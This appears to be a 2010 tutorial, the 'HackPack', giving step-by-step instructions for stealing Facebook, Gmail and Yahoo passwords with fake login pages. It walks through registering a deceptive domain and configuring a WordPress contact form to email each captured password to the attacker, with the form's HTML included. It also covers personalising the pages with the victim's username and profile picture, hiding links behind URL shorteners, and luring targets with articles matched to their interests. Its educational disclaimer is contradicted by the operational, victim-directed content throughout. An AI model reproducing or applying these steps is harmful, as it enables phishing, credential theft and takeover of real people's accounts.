the complete

HackPack
for Facebook, Gmail and Yahoo Accounts

Pratpurch 2010

Disclaimer
The following is intended for educational purpose only. The article only discusses certain ways of the being hacked in detail. I sincerely hope to educate people about the possibilities of losing their passwords to the hackers through this article. This document is helpful to its readers in knowing the ways the hackers crack their passwords, thus making them aware of their tricks. This would be immensely useful to the readers in keeping their accounts safe. My only motto behind making this is to educate the readers about the hacking techniques. I dont take any responsibility of the misuse of the knowledge gained through this tutorial by anyone. As the author of this book, I wish to warn my readers that hacking is a highly unethical activity and considered illegal in many states, also subjected to legal action. However, the readers are solely responsible for their own actions.

- Pratpurch

You have been warned

Contents
Introduction Overview Requirements Phase-I Making the website Making the page

Phase-II Putting the page up on internet Configuring the page Building a proper link for the page

Phase-III Knowing your victim Setting up the trap Receiving the prize err, password!

Introduction
There are commonly three methods of hacking passwords. They are discussed as follows. Key Loggers: They are the special softwares called the spywares installed on the computer without the consent of the owner of the computer. These scripts stay stealth on the computer and keep track of all the key strokes and usage of applications then store the details in log files. These log files are mailed to the hacker time to time as configured by him without the knowledge of the victim. Database Injection: This is a technique of gaining access into the database where the passwords are stored. The textboxes, where the usernames and the passwords are entered, act like a window to the database. Hackers use special codes in place of the username & password fields and get into the database. This is highly unlikely to work in case of the systems adapted by Google, Yahoo, etc... as they only store the encrypted password. Fake Page: This is the method in which the hacker throws a fake login page at the victim and if the victim falls for that, the password entered by him in the fake page is received by the hacker. The method we discuss in this tutorial is based on the third and my favourite, the Fake Page method.

Overview
Internet giants like Facebook or Gmail uses a very high level of security. This is a four layer security protocol what we are talking about. Each of the layers is the best in itself and hence makes it almost impossible for anyone to get into the account without the proper password. But remember, we are using a fake page method. So we dont really have to worry about the security protocols anymore. Our concentration, in this tutorial, would be to make a fake page that can fool the person we are kidding with! Making a fake login page is very easy but dont think just saving the real login page will do. Of course, that would be the first step. But, there are a series of steps that are required to be taken as to make the fake page save and send the password to you and the victim to his desired destination. When a victim is given a link of the fake page, it is to be made sure that the page carries him to the appropriate webpage after feeding the password. Otherwise, the victim would get suspicious and may change his password and never click the link again. There are mainly three important phases for the execution of this method. They are discussed in detail in the following pages

Requirements
1. 2. 3. 4. 5. A website A hosting account Basic knowledge of HTML Cunning skills Knowledge of the victims interests

If you already have the first two requirements, you are already half way through the process.

If you dont have a website or a hosting account, stick with me right from the phase-I of the tutorial.

If you dont have any knowledge of HTML, dont worry, just follow this document carefully and youll be fine.

Well, I am sure that you have the fourth requirement. Otherwise, you wont be reading this at all!

If you dont have much knowledge about the persons interests you want to hack, you can always read their profiles on those social networking sites.

Phase-I
Making the website Phase-I corresponds to making a website and have a hosting account set up where you can mount the fake page. A website has to be made before you make a fake page. To make the required website, follow these steps 1. Select a name for the website. Preferably a tricky name like mc995 or sn144 or such an alphanumeric term. The name should be like that because when we mount the fake page on this website, it looks more real with the URL. 2. Open the website co.cc and register the name of the website you decided. We consider sn144.co.cc as an example in this document. 3. Click on the manage domain tab to set up the domain. 4. Here, name-servers are to be updated in this page 5. Meanwhile, open freehostia.com (or any other hosting account you know) and register for a free hosting plan for the domain you just created. Soon, you will get an email containing the login and name-servers details. 6. Find the name-servers in the email and update them in the co.cc account (in step 4). 7. Open the freehostia control panel (login details in the email). Click on the Elephante free scripts in the web tools.

8. Click and Install Wordpress from the available options. Fill in the required fields. This installs wordpress on the domain that you choose, like that of sn144.co.cc. Remember the username and the password you filled. 9. Then login to your website at www.your-website-name/wplogin.php. Username and password are as filled in during the installation of the Wordpress. 10. This opens the Dashboard. Go to the plugins page and installs the plugin called contact form 7. You can search for this in the search field. Install and open its settings page. 11. Copy and paste the following in the Form field. <br><p>Email<br /> [text* your-name] </p> <br><p>[submit "Subscribe"]</p> 12. In the Mail, write your email address in the To: field and the code, [your-name], in the Subject: field. 13. Now click on Add new in the left side column under Posts and write a nice article about anything your victim is interested in. 14. Insert the line [contact-form 1 Contact-form 1 ] at the end of the article. Publish it and view the post. You should see your article and under it a text box called Email with a Subscribe button 15. Bookmark the link of the post.

Making the fake page Its time for making the fake page. It requires a lot of labour for doing that. Lucky for you, I have attached the pages that I have already made. All you have to do is to just open the file and make little changes.

I have attached all fake pages of Facebook, Gmail and Yahoomail that I have. There are two kinds of changes you have to make to those pages. One is a permanent that you dont have to change ever again and another one is what youll have to change every time you change a victim. You can learn about the permanent change here. The other kind of changes is discussed in the Configuration of fake page section. This change is about supplying the fake page the required tags (lines of code) that are responsible for saving the entered password and sending it to us. To find the code, you have to open the webpage that I asked you to bookmark in the previous section. After opening the page, open its source page by clicking Ctrl+U. This shortcut works in many browsers. The pages source can also be viewed by right clicking on it and choosing the required option.

The source contains hundreds of lines. Scroll down and identify the part of the code that contains the following in red (ABCD is not initially present, must be added to the code later).
<div class="wpcf7" id="wpcf7-f1-pxxx-xx><form action="ABCD/xxxxxxxxxx/#wpcf7-f1-pxxx-xx" method="post" class="wpcf7-form"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="1" /> <input type="hidden" name="_wpcf7_version" value="2.2" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1-pxxx-xx" /> </div> IMPORTANT: In the place of ABCD of the above code, write http://name-of-your-website/ Example: <formaction=http://www.sn144.co.cc/........

The code will not be exactly like this. I gave this code only as an example. You will find a different value in place of xxxxxs in your code. Copy only that from the pages source and paste it in a notepad. Save it with the name DIV. Now, open the fake pages I have provided with this document. Open each of them with notepads separately. On opening with the notepad, you can see the source code that constructs the page. Keeping the notepad open, hit Ctrl+F. This opens the Find window. Type in the word HACKPACK and hit enter. It would take you to the part of the source that contains that word. Replace the word HACKPACK with the code saved in the notepad file called DIV. Then save it.

Do it for every crude fake page I provided.

Phase-II
Putting the fake page up on internet It is easy from here on. To put the fake page up on the internet you have to login to your freehostia account (or any other hosting account you registered in) that you created in the first phase while creating the website. Open the file manager and make three different new folders namely google, ymail and facebook.com in the home directory. Upload the Gmail and Google accounts fake pages into the folder google. Upload the yahoomails fake page into the ymail folder. There are two files for facebook fake page. Both of them should be uploaded into the facebook.com folder. Read the READ ME I provided. Make sure this is done only after the making that permanent change in the fake pages. This step puts the fake pages up on the internet. Now the fake is visible to the world on the following addresses http://your-website-name/google/Google%20verify.htm http://your-website-name/ymail/Yahoo%20verify.htm http://y-w-n/facebook.com/Login%20%20%20Facebook.htm

Example: http://sn144.co.cc/ymail/yahoomail.htm

Configuring the fake page The fake page is ready. But before you use it on your victim, you have to configure it such a way that it asks for his password. Only then, he would feel that is a genuinely asked page and submit his password in the password field. To configure the fake page, open the freehostia account (or the hosting account). Open the file manager and reach the uploaded fake page. Open the page using the code editor. This opens the source code of the page. Hit Cntl+F and find the word PRATPURCH. They may be more than one. Replace them everywhere with your victims username and save it. When you open the link of this page, you will find a webpage that is asking for your victims password. Configure gmail and yahoomail fake page in this same way. Configuring the facebooks page is little different. It is same until the previous step except for you write the exact profile name of your victim instead of his username. Then hit Cntl+F and find the word PRATPIC. Replace this word with the image URL of your victims facebook profile pictures thumbnail. IMPORTANT: The thumbnail is different from the profile picture, should not be mistaken. It is the smaller form of the profile picture which can be found on the victims wall. The thumbnails URL can be obtained by right clicking on it and selecting Copy Image URL.

Building the proper link for the fake page Building a proper link for the page is necessary because when you send the link http://sn144.co.cc/ymail/yahoomail.htm to your victim, he will easily get suspicious about the safety of the link. If he is a HTML literate, he will easily know that it is an uploaded page and never click it. Hence we have to disguise the link of the fake page into another form before sending it to the victim. This is very easy. All you need is to open any of the following websites - http://bit.ly - http://tiny.cc I personally recommend the bit.ly. Copy the link of the fake page on the clipboard and paste it in the large field on bit.lys home page. Click on Shorten. This will give a short URL that is a substitute for the fake pages link. You can check, the short URL will also direct to the fake page just as the original one. Make sure that you dont make any change in the folder or the file names of the fake page on freehostia (hosting account). In case you do, the previous bit.ly short link will no longer work. You will have to create another bit.ly link for the new address of the fake page. The short link will look like http://bit.ly/xxxxx

Phase-III
Knowing your victim It is not necessary that your victim should click on every link that comes around. So it is required to make the link interesting enough for your victim to click on it and submit his password. To make the link that interesting, you have to be aware of his interests. You can know all about his interests and activities on his profiles on facebook, myspace, orkut or twitter. Setting up the trap Yeah, the link is ready. But you cant throw it over your victim yet. You have to find about his interests. Let us suppose that the victims interest is in cars. Now, write a nice article on some latest car by your victims favourite manufacturer. Remember, this is what you do in Phase-I: Making the website: Step 13 If you want to hack your victims gmail account, send a passage about the release of the new car and give the gmails fake page link as a continuation of the passage to his gmail id. If your victim has a yahoo account, send the link of the yahoos fake page.

Receiving the prize After all this effort of making websites and fake pages, the password what you get in the end is not less than a prize! The password entered by your victim will be delivered to you instantly in your inbox of the email you provided in the contact form 7 settings page (in the step 12 of Making the website, Phase-I). The password will be the subject of the email. The emails body will not contain anything. You can set up how you want to receive the password by the settings of the contact form 7. [your-name] is the code for the password. I have set it such a way that it is displayed as the subject of the mail. You can make changes as you want by putting this code in the body of the email. The concept behind this method is that the contact form 7 delivers anything that is entered in its fields to the email provided. I have interfaced the contact form with the fake page. Now, the password field in the fake page acts as the contact form 7 field and anything entered in it will be delivered to you in the email the way you set it up in the contact form 7 settings.

Points to remember Now you can hack anyones facebook or gmail or yahoo password in minutes. But you ought to remember the following points always freehostia account (or the hosting account) is different from the websites account. Remember each of their usernames and passwords. Test the link before you send it your victim Write the username or name correctly while configuring the fake pages. Dont send a gmail fake pages link to yahoo user or vice versa. That would be a blunder! Update the bit.ly link every time you make changes in the folders or the file names in freehostia (hosting account). Dont forget, there is an additional step in facebook pages configuration and there are two files to be uploaded. Know the difference between the thumbnail picture and the profile picture in facebook page configuration. Dont use the profile picture. sn144.co.cc is only an example used in this document used for better explanation. You have to select your own website name and use it where ever sn144 was used. Hacking is bad

Good luck

Contact pratpurch@gmail.com